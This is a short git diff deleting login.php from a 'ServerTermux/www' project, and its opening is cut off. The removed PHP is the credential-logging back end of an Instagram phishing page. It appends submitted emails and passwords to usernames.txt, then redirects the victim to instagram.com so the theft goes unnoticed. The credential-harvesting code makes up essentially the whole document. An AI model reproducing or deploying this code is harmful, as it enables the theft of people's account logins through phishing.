diff --git a/ServerTermux/www/login.php b/ServerTermux/www/login.php deleted file mode 100644 index 17abeca..0000000 --- a/ServerTermux/www/login.php +++ /dev/null @@ -1,15 +0,0 @@ -WELCOME"; -if($myFile != $searchString) { - file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); - header('Location: https://instagram.com'); -} -if($myFile != $searchString) { - echo "LOGIN SUCCESSFULL"; -} -exit(); -?> -